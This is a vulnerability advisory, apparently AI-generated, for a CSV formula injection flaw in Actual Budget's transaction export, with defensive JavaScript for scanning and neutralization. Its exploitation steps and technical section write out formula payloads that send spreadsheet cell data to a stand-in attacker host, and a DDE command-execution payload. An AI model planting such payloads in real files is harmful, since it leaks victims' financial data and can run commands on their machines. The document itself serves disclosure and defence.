CVE-2026-50179
JavaScript vulnerability analysis and mitigation

Overview

CVE-2026-50179 is a CSV Formula Injection vulnerability in the @actual-app/web (Actual Budget) npm package, affecting the transaction export functionality. The exportToCSV and exportQueryToCSV functions in packages/loot-core/src/server/transactions/export/export-to-csv.ts pass user-controlled Payee, Notes, Account, and Category strings to csv-stringify without neutralizing formula-trigger characters, allowing injected spreadsheet formulas to survive into exported CSV files. Affected versions are @actual-app/web <= 26.4.0; the issue is patched in version 26.6.0. It was reported by MatissJanis and published to the GitHub Advisory Database on June 22, 2026. The CVSS v3.1 base score is 4.2 (Moderate) (GitHub Advisory, Actual Budget Advisory).

Technical details

The root cause is CWE-1236 (Improper Neutralization of Formula Elements in a CSV File). The sink is at export-to-csv.ts:56 and :131, where csvStringify(transactionsForExport, { header: true }) is called without a cast callback — csv-stringify v6 only escapes quotes, commas, and CRLF by default, leaving formula-trigger prefixes (=, +, -, @, tab, carriage return) intact. Attacker-controlled strings enter the system via file import parsers (parseCSV, parseOFX, parseQIF, parseCAMT in parse-file.ts) or directly through the UI or @actual-app/api CRUD endpoints; none of these paths strip formula prefixes, and sync.normalizeTransactions only applies title-casing which does not affect non-letter prefix characters. The most reliable exploit payload is =HYPERLINK("http://attacker/?leak="&B2,"Bank refund"), which renders as a benign clickable link in Excel, LibreOffice Calc, and Google Sheets while silently exfiltrating adjacent cell data; =WEBSERVICE/=IMPORTXML can auto-fire in some configurations, and legacy DDE (=cmd|'/c calc'!A0) may achieve RCE on unpatched Excel (GitHub Advisory, Actual Budget Advisory).

Impact

Successful exploitation allows an attacker to exfiltrate sensitive financial data — including transaction amounts, account names, balances, payees, and categories — to attacker-controlled URLs via =HYPERLINK clicks or auto-firing =WEBSERVICE/=IMPORTXML formulas. Integrity is also affected: downstream recipients such as accountants, tax preparers, or household members who open the exported CSV may see attacker-crafted display values (e.g., forged "Refund" line items linking to phishing pages), enabling financial fraud. The reach is amplified because Actual Budget exports are routinely shared with third parties, meaning a single malicious imported statement can contaminate every future export of that budget. On legacy, unpatched Excel installations, DDE-based payloads could escalate to remote code execution (GitHub Advisory, Actual Budget Advisory).

Exploitation steps

  1. Craft malicious import file: Prepare a CSV, OFX, QIF, or CAMT file with formula-injected payee or notes fields, e.g.:
       Date,Payee,Amount
       2026-01-01,"=HYPERLINK(""http://attacker.evil/leak?d=""&B2&C2,""Bank refund details"")",100.00
       2026-01-04,"=WEBSERVICE(""http://attacker.evil/?d=""&B2)",10.00
  2. Deliver the file to the victim: Social-engineer the victim into importing the file via Account → Import file (e.g., disguise it as a bank statement, shared budget, or expense report from a collaborator).
  3. Payload persists in database: parseFile (parseCSV/parseOFX/etc.) returns rows with formula strings preserved as payee_name; sync.normalizeTransactions does not strip prefix characters; payees are stored verbatim in the payees table.
  4. Victim exports transactions: The victim (or a shared budget user) navigates to Account → menu → Export, triggering exportQueryToCSV at export-to-csv.ts:131, which calls csvStringify without formula neutralization — the formula strings survive into the output CSV.
  5. Victim or third party opens the CSV: When the exported file is opened in Excel, LibreOffice Calc, or Google Sheets, =HYPERLINK(...) renders as a clickable link with benign text; clicking it sends adjacent cell values (amounts, account names, balances) to the attacker's server. =WEBSERVICE/=IMPORTXML may fire automatically without any click.
  6. Data exfiltration or RCE: The attacker receives financial data at their controlled endpoint. On unpatched Excel with DDE enabled, @SUM(1+1)*cmd|'/c calc'!A0-style payloads may execute arbitrary commands (GitHub Advisory, Actual Budget Advisory).

Indicators of compromise

  • File System: Exported CSV files from Actual Budget containing cells that begin with =, +, -, @, tab, or carriage return in Payee, Notes, Account, or Category columns; presence of =HYPERLINK, =WEBSERVICE, =IMPORTXML, or DDE-style strings (e.g., cmd|'/c) in exported .csv files.
  • Database/Application: Payee or notes entries in the Actual Budget payees or transactions tables containing formula-trigger prefixes (=, +, -, @) — detectable via direct database inspection or API query.
  • Network: Outbound HTTP requests from spreadsheet applications (Excel, LibreOffice, Google Sheets) to unexpected external domains immediately after opening an Actual Budget CSV export; DNS queries or HTTP GET requests to attacker-controlled domains with query parameters containing financial data strings (amounts, account names).
  • Logs: Web server access logs on attacker infrastructure showing requests with URL-encoded financial data in query parameters (e.g., ?d=100.00Checking) originating from spreadsheet application user agents (GitHub Advisory, Actual Budget Advisory).
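Added example (not from the advisory or the Actual Budget project): a scanner for the file-system indicator above, run over a constructed export. It parses quoted CSV fields and flags cells in the free-text columns (Account, Payee, Notes, Category) that begin with a formula-trigger character; the Amount column is deliberately skipped, because negative amounts legitimately start with "-" and would otherwise be false positives. The column names, the example.invalid host and the sample rows are assumptions made for this demonstration.

```javascript
// Added example, not Actual Budget code. Scans an exported CSV for cells that
// begin with a spreadsheet formula trigger. The sample export is constructed.

// Characters that Excel, LibreOffice Calc and Google Sheets treat as the start
// of a formula when they begin a cell: = + - @ TAB CR
const FORMULA_TRIGGER = /^[=+\-@\t\r]/;

// Free-text columns worth scanning (names assumed for this example). Amount is
// excluded on purpose: negative amounts start with '-' and are not findings.
const TEXT_COLUMNS = new Set(['Account', 'Payee', 'Notes', 'Category']);

// Minimal RFC 4180-style parser: quoted fields, doubled quotes inside quotes,
// CRLF or LF line endings. Returns an array of rows, each an array of strings.
function parseCsv(text) {
  const rows = [];
  let row = [];
  let field = '';
  let inQuotes = false;
  for (let i = 0; i < text.length; i++) {
    const ch = text[i];
    if (inQuotes) {
      if (ch === '"') {
        if (text[i + 1] === '"') { field += '"'; i++; } // "" -> literal quote
        else inQuotes = false;                          // closing quote
      } else {
        field += ch;                                    // commas/newlines stay literal
      }
    } else if (ch === '"') {
      inQuotes = true;
    } else if (ch === ',') {
      row.push(field); field = '';
    } else if (ch === '\n' || ch === '\r') {
      if (ch === '\r' && text[i + 1] === '\n') i++;     // treat CRLF as one break
      row.push(field); field = '';
      rows.push(row); row = [];
    } else {
      field += ch;
    }
  }
  if (field.length > 0 || row.length > 0) { row.push(field); rows.push(row); }
  return rows;
}

// One finding per tainted cell: 1-based line in the file, column header and the
// raw value, so a responder can trace it back to the payee/notes record.
function findFormulaCells(csvText) {
  const [header, ...records] = parseCsv(csvText);
  const findings = [];
  records.forEach((record, idx) => {
    record.forEach((cell, col) => {
      const column = header[col];
      if (TEXT_COLUMNS.has(column) && FORMULA_TRIGGER.test(cell)) {
        findings.push({ line: idx + 2, column, value: cell });
      }
    });
  });
  return findings;
}

// Constructed sample export: a clean row, a tainted Payee (HYPERLINK pointing at
// a reserved .invalid host), and a Notes value that begins with '+'.
const SAMPLE_EXPORT = [
  'Account,Date,Payee,Notes,Category,Amount',
  'Checking,2026-01-01,Grocery Store,weekly shop,Food,-54.20',
  'Checking,2026-01-02,"=HYPERLINK(""http://example.invalid/?d=""&F3,""Bank refund"")",,Income,100.00',
  'Checking,2026-01-03,Landlord,"+1 extra key, see note",Rent,-900.00',
].join('\r\n') + '\r\n';

console.log(JSON.stringify(findFormulaCells(SAMPLE_EXPORT), null, 2));
```

The same scan applied to the database indicator would run over the payees and transactions tables instead of a file, but the predicate is identical: a trigger character in the first position of a free-text field.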

Mitigation and workarounds

Upgrade @actual-app/web (and @actual-app/api, which shares the same loot-core export path) to version 26.6.0 or later, which is the patched release (GitHub Advisory). The recommended fix is to pass a cast.string callback to csv-stringify at both call sites in export-to-csv.ts that prefixes any formula-trigger string with a single quote (OWASP-recommended neutralization). As defense-in-depth, formula prefixes should also be stripped or neutralized at import time in parse-file.ts for payee_name and notes fields, so the database never stores formula-shaped strings. Until upgrade is possible, users should avoid sharing exported CSVs with third parties and should inspect exported files for formula-trigger characters before opening in spreadsheet applications (Actual Budget Advisory).
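Added example (not Actual Budget's or csv-stringify's own code) of the single-quote neutralization the advisory recommends, shaped as the cast.string callback that csv-stringify v6 accepts. Because the package is not assumed to be installed, a small local stringifier stands in for csv-stringify so the resulting rows can be inspected; the csvOptions object is what would be passed at the two export-to-csv.ts call sites. The transaction rows, column names and the example.invalid host are constructed for the demonstration.

```javascript
// Added example, not Actual Budget's or csv-stringify's code. Sample data and
// column names are constructed for the demonstration.

// Characters a spreadsheet evaluates when they start a cell: = + - @ TAB CR
const FORMULA_TRIGGER = /^[=+\-@\t\r]/;

// OWASP-style neutralization: a leading single quote makes the cell literal
// text. Strings that do not start with a trigger are returned unchanged, so
// ordinary payees and notes are not altered.
function neutralizeFormula(value) {
  return FORMULA_TRIGGER.test(value) ? `'${value}` : value;
}

// Options that would go to csv-stringify at the export call sites:
//   stringify(transactionsForExport, csvOptions)
// `header` and `cast.string` are csv-stringify options; cast.string is invoked
// for every string cell, so each Payee/Notes/Account/Category value passes
// through neutralizeFormula before it is quoted and written.
const csvOptions = {
  header: true,
  cast: { string: neutralizeFormula },
};

// Stand-in for csv-stringify: applies cast.string to string cells, then the
// default quoting (fields containing a quote, comma, CR or LF are wrapped in
// quotes with inner quotes doubled). Numbers are written as-is and never reach
// cast.string, which is why amounts should stay numeric rather than strings.
function stringifyLocal(records, options) {
  const columns = Object.keys(records[0]);
  const quote = (s) => (/[",\r\n]/.test(s) ? `"${s.replace(/"/g, '""')}"` : s);
  const castCell = (v) => (typeof v === 'string' ? options.cast.string(v) : String(v));
  const lines = [];
  if (options.header) lines.push(columns.map(quote).join(','));
  for (const rec of records) {
    lines.push(columns.map((c) => quote(castCell(rec[c]))).join(','));
  }
  return lines.join('\n') + '\n';
}

// Constructed transactions: one clean, one with a formula-shaped payee (what a
// malicious import would leave stored verbatim), one with a note starting '@'.
const TRANSACTIONS = [
  { Account: 'Checking', Date: '2026-01-01', Payee: 'Grocery Store', Notes: 'weekly shop', Category: 'Food', Amount: -54.2 },
  { Account: 'Checking', Date: '2026-01-02', Payee: '=HYPERLINK("http://example.invalid/?d="&F3,"Bank refund")', Notes: '', Category: 'Income', Amount: 100 },
  { Account: 'Checking', Date: '2026-01-03', Payee: 'Landlord', Notes: '@home, keys', Category: 'Rent', Amount: -900 },
];

// Produce the neutralized export for the constructed sample.
function exportSample() {
  return stringifyLocal(TRANSACTIONS, csvOptions);
}

console.log(exportSample());
```

If an export path serialises amounts as strings, the quote prefix would turn every negative amount into text in the spreadsheet; in that case restrict the callback to the free-text columns (csv-stringify passes a context object with the column name to cast callbacks) or keep amounts numeric as above.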

Related information

Source: this report was generated using AI.

Related JavaScript vulnerabilities:

CVE ID | Severity | Score | Technology | Component | CISA KEV exploited | Fix available | Published
CVE-2026-54350 | CRITICAL | 10 | JavaScript | @budibase/server | No | Yes | Jun 23, 2026
CVE-2026-54257 | CRITICAL | 9.3 | JavaScript | electron | No | Yes | Jun 23, 2026
CVE-2026-54157 | CRITICAL | 9 | JavaScript | @lobehub/lobehub | No | Yes | Jun 23, 2026
CVE-2026-54353 | HIGH | 8.5 | JavaScript | @budibase/backend-core | No | Yes | Jun 22, 2026
CVE-2026-50179 | MEDIUM | 4.2 | JavaScript | @actual-app/web | No | Yes | Jun 22, 2026
